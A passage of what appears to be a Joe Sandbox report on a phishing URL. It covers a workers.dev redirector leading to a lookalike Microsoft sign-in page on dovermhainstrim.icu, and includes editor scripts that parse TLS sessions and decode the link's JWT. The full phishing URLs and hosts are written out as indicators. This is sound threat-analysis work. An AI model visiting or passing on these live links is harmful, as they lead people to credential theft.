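143.198.129.211:443 -> 192.168.2.16:49769 version: TLS 1.2
143.198.129.211:443 -> 192.168.2.16:49770 version: TLS 1.2
143.198.129.211:443 -> 192.168.2.16:49777 version: TLS 1.2
143.198.129.211:443 -> 192.168.2.16:49779 version: TLS 1.2
143.198.129.211:443 -> 192.168.2.16:49778 version: TLS 1.2
""".splitlines()

# IP -> name, inverted from the report's Name/IP table. IPs the report
# leaves unresolved (2.23.227.208, 104.18.95.41) are deliberately absent.
IP_TO_HOST = {
    "104.21.13.238": "e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev",
    "104.18.187.31": "cdn.jsdelivr.net.cdn.cloudflare.net",
    "104.18.94.41": "challenges.cloudflare.com",
    "142.251.35.164": "www.google.com",
    "13.107.246.40": "s-part-0012.t-0009.t-msedge.net",
    "23.219.36.138": "a1894.dscb.akamai.net",
    "13.107.9.156": "b-0004.b-dc-msedge.net",
    "143.198.129.211": "dovermhainstrim.icu",
}

LINE_RE = re.compile(
    r"^(?P<sip>\d{1,3}(?:\.\d{1,3}){3}):(?P<sport>\d+) -> "
    r"(?P<cip>\d{1,3}(?:\.\d{1,3}){3}):(?P<cport>\d+) version: (?P<tls>.+)$"
)


def parse_https_line(line):
    """Split one row into server/client endpoints and the TLS version."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparsable row: {line!r}")
    rec = m.groupdict()
    rec["sport"], rec["cport"] = int(rec["sport"]), int(rec["cport"])
    return rec


def sessions_by_host(lines, ip_to_host):
    """Map each destination (hostname if known, else bare IP) to the sorted
    list of client ports that connected to it, one entry per TLS session."""
    groups = defaultdict(list)
    for line in lines:
        rec = parse_https_line(line)
        groups[ip_to_host.get(rec["sip"], rec["sip"])].append(rec["cport"])
    return {host: sorted(ports) for host, ports in groups.items()}


def tls_versions(lines):
    """Count negotiated TLS versions across all sessions."""
    return Counter(parse_https_line(line)["tls"] for line in lines)


def first_contact_order(lines, ip_to_host):
    """Destinations ordered by their lowest client port. Windows hands out
    ephemeral ports roughly in sequence, so this approximates the order in
    which Chrome first opened a socket to each host (the redirect chain)."""
    groups = sessions_by_host(lines, ip_to_host)
    return sorted(groups, key=lambda host: groups[host][0])


if __name__ == "__main__":
    by_host = sessions_by_host(HTTPS_LINES, IP_TO_HOST)
    for host in first_contact_order(HTTPS_LINES, IP_TO_HOST):
        print(f"{len(by_host[host]):2d} session(s)  {host:<48} {by_host[host]}")
    print(dict(tls_versions(HTTPS_LINES)))
```

Run as-is it lists the workers.dev redirector first (3 sessions), then jsdelivr, the Cloudflare Turnstile host, Google and the CDN hosts once or twice each, and dovermhainstrim.icu with 7 sessions, the most of any host and the one serving the lookalike GetCredentialType endpoint. Every session in the report negotiated TLS 1.2.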
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\scoped_dir6244_1939338047
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File deleted: C:\Windows\SystemTemp\scoped_dir6244_1939338047
Source: classification engine | Classification label: mal56.phis.win@27/17@24/165
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,3110005224580043279,10307581202711868803,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2244 /prefetch:3
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown (2 occurrences; image path and command line not recorded)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,3110005224580043279,10307581202711868803,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2244 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown (21 occurrences; image path and command line not recorded)
Source: Window Recorder | Window detected: More than 3 window changes detected
MITRE ATT&CK matrix. A number in parentheses is the count of matched signatures the sandbox mapped to that technique; entries without a count are the matrix placeholders and did not trigger.
Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server
Initial Access: Drive-by Compromise (1), Default Accounts, Domain Accounts, Local Accounts
Execution: Windows Management Instrumentation, Scheduled Task/Job, At, Cron
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook
Privilege Escalation: Process Injection (1), Extra Window Memory Injection (1), Logon Script (Windows), Login Hook
Defense Evasion: Masquerading (1), Process Injection (1), File Deletion (1), Extra Window Memory Injection (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS
Discovery: System Service Discovery, Application Window Discovery, Query Registry, System Network Configuration Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture
Command and Control: Encrypted Channel (1), Non-Application Layer Protocol (4), Application Layer Protocol (5), Ingress Tool Transfer (3)
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction

Screenshots: this section of the report holds the screenshot thumbnails, which are not reproduced in this text version.
Initial sample
Source | Detection | Scanner | Label
https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c | 0% | Avira URL Cloud | safe
No Antivirus matches (dropped files, unpacked PE files, domains: all three tables empty)
URLs
Source | Detection | Scanner | Label
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92690b6b4f3ea0f4&lang=auto | 0% | Avira URL Cloud | safe
https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/favicon.ico | 0% | Avira URL Cloud | safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/new/normal/auto/ | 0% | Avira URL Cloud | safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/92690b6b4f3ea0f4/1743017239432/udH6orPBiQK-Aio | 0% | Avira URL Cloud | safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/92690b6b4f3ea0f4/1743017239427/b11b001df3e4df6e56c55deecaddd5320f067bee9f1e79c065e3a3abebc4451a/Lba_3YOgfFBLE2t | 0% | Avira URL Cloud | safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92690c198d8043fb&lang=auto | 0% | Avira URL Cloud | safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv75KWu00x_j8ePxwWqZoxHl0023scJz5x5keh3mFGQO4-1743017238-1.3.1.1-jx_ft8_17g_0aYlijdJ.MKowAo7nzTG5WB5RG6S_jWw/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/failure_retry/normal/auto/ | 0% | Avira URL Cloud | safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/92690c198d8043fb/1743017267269/20ef7ed6af7716c2d33dbf968f23fffc06de1674adc4fea29426c51f8039b9b8/-1Wpqa_tefiexnv | 0% | Avira URL Cloud | safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/75863169:1743013566:8s5SCde_e_Y_rNlGSSewHykECy-1C9QdLwSuVYycC9I/92690c198d8043fb/whuvwZbUt_spxQaC6mzY5BJb.DzqfRU5VC3g7NpYCkU-1743017266-1.1.1.1-Oou4gX7mU1V32eGyTIN1Ea6G8kGUXesUAAmDyNOxg2wezKGA_LizmdbBAOLaZsO8 | 0% | Avira URL Cloud | safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/92690c198d8043fb/1743017267269/Qa4rFPeeM4yObLp | 0% | Avira URL Cloud | safe
https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwg | 0% | Avira URL Cloud | safe
https://dovermhainstrim.icu/?sign=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2RvdmVybWhhaW5zdHJpbS5pY3UvIiwiZG9tYWluIjoiZG92ZXJtaGFpbnN0cmltLmljdSIsImtleSI6IlhNRTVmSGFWVElVRiIsInJlZiI6bnVsbCwiaWF0IjoxNzQzMDE3Mjc2LCJleHAiOjE3NDMwMTczOTZ9.A7dhC-EcPIGb2ArdizRnXGDDwF2DwmwJ_bm9_3_Qmgo | 0% | Avira URL Cloud | safe
https://dovermhainstrim.icu/common/GetCredentialType?mkt=en-US | 0% | Avira URL Cloud | safe
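Two of the URLs in this report carry tokens worth opening before anyone pivots on them. The dovermhainstrim.icu landing URL passes a `sign` parameter that is a JWT (header `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9` is the standard `{"alg":"HS256","typ":"JWT"}`), and the workers.dev sample URL starts its parameters with `&` instead of `?`, which trips standard URL parsers. The script below is an added example written for this page, not Joe Sandbox output; the two URLs are copied from the report and everything else is the editor's. The JWT is only decoded, never verified: the HS256 secret lives on the kit operator's server, so the signature bytes are just counted. Its `iat` claim converts to 2025-03-26 19:27:56 UTC, about 75 seconds after the analysis start time given further down in this report, and `exp` is 120 seconds later, so the signed link is single-use in practice. The `auth` value is two 40-hex-digit strings joined by `-`; the script splits them but makes no claim about what they are, since the report does not say.

```python
"""Decode the JWT in the 'sign' parameter and the malformed sample URL.

Added example for this report page, not Joe Sandbox output. The URLs are
copied from the report; the decoder is the editor's. The JWT signature is
NOT verified (no secret), only its length is reported.
"""
import base64
import json
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlsplit

LANDING_URL = (
    "https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/"
    "&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf"
    "&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c"
)
SIGN_URL = "https://dovermhainstrim.icu/?sign=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2RvdmVybWhhaW5zdHJpbS5pY3UvIiwiZG9tYWluIjoiZG92ZXJtaGFpbnN0cmltLmljdSIsImtleSI6IlhNRTVmSGFWVElVRiIsInJlZiI6bnVsbCwiaWF0IjoxNzQzMDE3Mjc2LCJleHAiOjE3NDMwMTczOTZ9.A7dhC-EcPIGb2ArdizRnXGDDwF2DwmwJ_bm9_3_Qmgo"

HEX_DIGITS = set("0123456789abcdef")


def b64url_decode(segment):
    """JWT segments drop base64 padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_unverified(token):
    """Return (header, claims, raw_signature) WITHOUT checking the signature."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    return (
        json.loads(b64url_decode(header_b64)),
        json.loads(b64url_decode(payload_b64)),
        b64url_decode(sig_b64),
    )


def sign_token(url):
    """Extract the 'sign' query parameter from a well-formed URL."""
    return parse_qs(urlsplit(url).query)["sign"][0]


def validity_window(claims):
    """(issued-at, expiry, lifetime in seconds) from the iat/exp claims."""
    iat, exp = int(claims["iat"]), int(claims["exp"])
    to_utc = lambda ts: datetime.fromtimestamp(ts, timezone.utc)
    return to_utc(iat), to_utc(exp), exp - iat


def landing_params(url):
    """The sample URL starts its parameters with '&' instead of '?', so
    urlsplit() leaves them in the path. Split them off by hand."""
    path = urlsplit(url).path
    if "&" not in path:
        return {}
    _, _, params = path.partition("&")
    return {k: v[0] for k, v in parse_qs(params).items()}


def split_auth(auth_value):
    """The auth value is two 40-hex-digit strings joined by '-'. Return them
    as a tuple; what they encode is not knowable from the report alone."""
    parts = auth_value.split("-")
    if len(parts) != 2 or any(len(p) != 40 or set(p) - HEX_DIGITS for p in parts):
        raise ValueError("unexpected auth format")
    return tuple(parts)


if __name__ == "__main__":
    header, claims, sig = decode_jwt_unverified(sign_token(SIGN_URL))
    iat, exp, ttl = validity_window(claims)
    print(header)
    print(json.dumps(claims, indent=2))
    print(f"valid {iat.isoformat()} -> {exp.isoformat()} ({ttl} s); signature {len(sig)} bytes")
    params = landing_params(LANDING_URL)
    print("umid:", params["umid"])
    print("auth:", split_auth(params["auth"]))
```

The decoded claims are `url`, `domain`, `key`, `ref` (null here) and the `iat`/`exp` pair; the 32-byte signature length is consistent with HS256. Because the token is unverifiable without the secret, treat the claims as attacker-controlled strings when feeding them into blocklists or pivots.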
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0012.t-0009.t-msedge.net | 13.107.246.40 | true | false | - | high
cdn.jsdelivr.net.cdn.cloudflare.net | 104.18.187.31 | true | false | - | high
e329293.dscd.akamaiedge.net | 23.209.72.9 | true | false | - | high
b-0004.b-dc-msedge.net | 13.107.9.156 | true | false | - | high
challenges.cloudflare.com | 104.18.94.41 | true | false | - | high
e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev | 104.21.13.238 | true | true | - | unknown
www.google.com | 142.251.35.164 | true | false | - | high
a1894.dscb.akamai.net | 23.219.36.138 | true | false | - | high
dovermhainstrim.icu | 143.198.129.211 | true | false | - | unknown
cdn.jsdelivr.net | unknown | unknown | false | - | high
identity.nel.measure.office.net | unknown | unknown | false | - | high
portal.microsoftonline.com | unknown | unknown | false | - | high
aadcdn.msftauth.net | unknown | unknown | false | - | high
Name | Malicious | Antivirus Detection | Reputation
https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c | true | - | unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/new/normal/auto/ | false | Avira URL Cloud: safe | unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv75KWu00x_j8ePxwWqZoxHl0023scJz5x5keh3mFGQO4-1743017238-1.3.1.1-jx_ft8_17g_0aYlijdJ.MKowAo7nzTG5WB5RG6S_jWw/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/failure_retry/normal/auto/ | false | Avira URL Cloud: safe | unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1 | false | - | high
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/75863169:1743013566:8s5SCde_e_Y_rNlGSSewHykECy-1C9QdLwSuVYycC9I/92690c198d8043fb/whuvwZbUt_spxQaC6mzY5BJb.DzqfRU5VC3g7NpYCkU-1743017266-1.1.1.1-Oou4gX7mU1V32eGyTIN1Ea6G8kGUXesUAAmDyNOxg2wezKGA_LizmdbBAOLaZsO8 | false | Avira URL Cloud: safe | unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/92690b6b4f3ea0f4/1743017239432/udH6orPBiQK-Aio | false | Avira URL Cloud: safe | unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/92690c198d8043fb/1743017267269/20ef7ed6af7716c2d33dbf968f23fffc06de1674adc4fea29426c51f8039b9b8/-1Wpqa_tefiexnv | false | Avira URL Cloud: safe | unknown
https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwg | false | Avira URL Cloud: safe | unknown
https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+est | false | - | high
https://cdn.jsdelivr.net/gh/Joe12387/detectIncognito@main/dist/es5/detectIncognito.min.js | false | - | high
https://dovermhainstrim.icu/?sign=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2RvdmVybWhhaW5zdHJpbS5pY3UvIiwiZG9tYWluIjoiZG92ZXJtaGFpbnN0cmltLmljdSIsImtleSI6IlhNRTVmSGFWVElVRiIsInJlZiI6bnVsbCwiaWF0IjoxNzQzMDE3Mjc2LCJleHAiOjE3NDMwMTczOTZ9.A7dhC-EcPIGb2ArdizRnXGDDwF2DwmwJ_bm9_3_Qmgo | false | Avira URL Cloud: safe | unknown
https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/favicon.ico | false | Avira URL Cloud: safe | unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/92690b6b4f3ea0f4/1743017239427/b11b001df3e4df6e56c55deecaddd5320f067bee9f1e79c065e3a3abebc4451a/Lba_3YOgfFBLE2t | false | Avira URL Cloud: safe | unknown
https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.js | false | - | high
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92690c198d8043fb&lang=auto | false | Avira URL Cloud: safe | unknown
https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback | false | - | high
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92690b6b4f3ea0f4&lang=auto | false | Avira URL Cloud: safe | unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/92690c198d8043fb/1743017267269/Qa4rFPeeM4yObLp | false | Avira URL Cloud: safe | unknown
https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+wst | false | - | high
https://portal.microsoftonline.com/Prefetch/Prefetch.aspx | false | - | high
https://dovermhainstrim.icu/common/GetCredentialType?mkt=en-US | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.13.238 | e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev | United States | 13335 | CLOUDFLARENETUS | true
1.1.1.1 | unknown | Australia | 13335 | CLOUDFLARENETUS | false
13.107.246.40 | s-part-0012.t-0009.t-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
142.250.65.174 | unknown | United States | 15169 | GOOGLEUS | false
104.18.187.31 | cdn.jsdelivr.net.cdn.cloudflare.net | United States | 13335 | CLOUDFLARENETUS | false
20.189.173.6 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
104.18.94.41 | challenges.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false
172.253.63.84 | unknown | United States | 15169 | GOOGLEUS | false
104.18.95.41 | unknown | United States | 13335 | CLOUDFLARENETUS | false
142.250.80.99 | unknown | United States | 15169 | GOOGLEUS | false
23.219.36.138 | a1894.dscb.akamai.net | United States | 20940 | AKAMAI-ASN1EU | false
20.190.151.67 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
13.107.9.156 | b-0004.b-dc-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
142.251.35.164 | www.google.com | United States | 15169 | GOOGLEUS | false
143.198.129.211 | dovermhainstrim.icu | United States | 15557 | LDCOMNETFR | false
142.250.65.202 | unknown | United States | 15169 | GOOGLEUS | false
Private IPs (analysis network): 192.168.2.16, 192.168.2.5
                                                Joe Sandbox version:42.0.0 Malachite
                                                Analysis ID:1649488
                                                Start date and time:2025-03-26 20:26:41 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                Sample URL:https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:16
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • EGA enabled
                                                Analysis Mode:stream
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal56.phis.win@27/17@24/165
                                                • Exclude process from analysis (whitelisted): svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 142.250.65.174, 142.250.80.99, 172.253.63.84, 142.251.32.110
                                                • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                • Not all processes were analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtOpenFile calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:GIF image data, version 89a, 352 x 3
                                                Category:downloaded
                                                Size (bytes):3620
                                                Entropy (8bit):6.867828878374734
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://dovermhainstrim.icu/aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif
                                                Preview:
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (3937)
                                                Category:downloaded
                                                Size (bytes):5270
                                                Entropy (8bit):5.474400542516616
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:7B30772ECC161EDE21216D4430829ACB
                                                SHA1:1323174C192B1E970C4D8AD2D0E95032364C09C6
                                                SHA-256:4CABA20287EBAA975B3F24090C94A9CAEA10C880B692AC654456900D23996757
                                                SHA-512:8BC650C655F67F2D9F56503F3E45051F066C03C51ED8F46DF018D2DA9F0B87734199DE51E1A3366D71DBD6823E64B71F75F81BDA62D3282B79A4D3234E5B2FDF
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://cdn.jsdelivr.net/gh/Joe12387/detectIncognito@main/dist/es5/detectIncognito.min.js
                                                Preview:/*!. *. * detectIncognito v1.3.7. *. * https://github.com/Joe12387/detectIncognito. *. * MIT License. *. * Copyright (c) 2021 - 2025 Joe Rutkowski <Joe@dreggle.com>. *. * Permission is hereby granted, free of charge, to any person obtaining a copy. * of this software and associated documentation files (the "Software"), to deal. * in the Software without restriction, including without limitation the rights. * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. * copies of the Software, and to permit persons to whom the Software is. * furnished to do so, subject to the following conditions:. *. * The above copyright notice and this permission notice shall be included in all. * copies or substantial portions of the Software.. *. * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,. * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE. * AUTHOR
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (48122)
                                                Category:downloaded
                                                Size (bytes):48123
                                                Entropy (8bit):5.342998089666478
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:EA38BDA3C117E2FE01BD862003357394
                                                SHA1:767CCB3589E3067EE1B348DF2426A9E2E32CEE5C
                                                SHA-256:719423C7B70AC911F76D00B3AE514D108A8315EA60A80519820BE50C0E4C96EF
                                                SHA-512:F50FAB9DC2263F40216DF26C234AD390091F23185650E9B4E4748CF09CFEDF2D92A99FC81C986234580844393305AC2195E096DEDB64D9A25A99EF7BE510FFCA
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.js
                                                Preview:
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text
                                                Category:downloaded
                                                Size (bytes):689016
                                                Entropy (8bit):4.210696031972732
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:3B72E939A304CE05F0CEAB4A0AC39DD9
                                                SHA1:B2CFD3CB1BD0EE53C795E040063D0F55F544D939
                                                SHA-256:CC58721894324D6F6F53B7FE4CB0D08F923AA75E52506C0A58D29E4390B7CEDD
                                                SHA-512:F4AF43BA51B76496C98A30F06D9903440C4957E18F82B09D2B9C706CAD5939446D8BAA4353FD0620A2F68CEA79878824CD2313594997F0F8403C13FF767E6112
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://dovermhainstrim.icu/aadcdn.msauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_GjP1RdcVSKf6ASC7mgkR1g2.js
                                                Preview:
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:downloaded
                                                Size (bytes):28
                                                Entropy (8bit):4.307354922057605
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:9F9FA94F28FE0DE82BC8FD039A7BDB24
                                                SHA1:6FE91F82974BD5B101782941064BCB2AFDEB17D8
                                                SHA-256:9A37FDC0DBA8B23EB7D3AA9473D59A45B3547CF060D68B4D52253EE0DA1AF92E
                                                SHA-512:34946EF12CE635F3445ED7B945CF2C272EF7DD9482DA6B1A49C9D09A6C9E111B19B130A3EEBE5AC0CCD394C523B54DD7EB9BF052168979A9E37E7DB174433F64
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCSUA-vmWZbFMEgUN0VtRUhIFDVd69_0hs1fqvvu-2Mw=?alt=proto
                                                Preview:ChIKBw3RW1FSGgAKBw1Xevf9GgA=
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                Category:downloaded
                                                Size (bytes):673
                                                Entropy (8bit):7.6596900876595075
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:0E176276362B94279A4492511BFCBD98
                                                SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://dovermhainstrim.icu/aadcdn.msauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
                                                Preview:
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:GIF image data, version 89a, 352 x 3
                                                Category:dropped
                                                Size (bytes):2672
                                                Entropy (8bit):6.640973516071413
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:166DE53471265253AB3A456DEFE6DA23
                                                SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 56 x 79, 8-bit/color RGB, non-interlaced
                                                Category:downloaded
                                                Size (bytes):61
                                                Entropy (8bit):4.035372245524405
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:93201BE807C5EE9B461ADDD894FE8C25
                                                SHA1:8F91EB63D427CB00C05456FD29F9A5DE1BDE833A
                                                SHA-256:7D42C26F125BE4A2291985AB36B4A6CDAE13E7A2E31274898ACB504EFE7C94C7
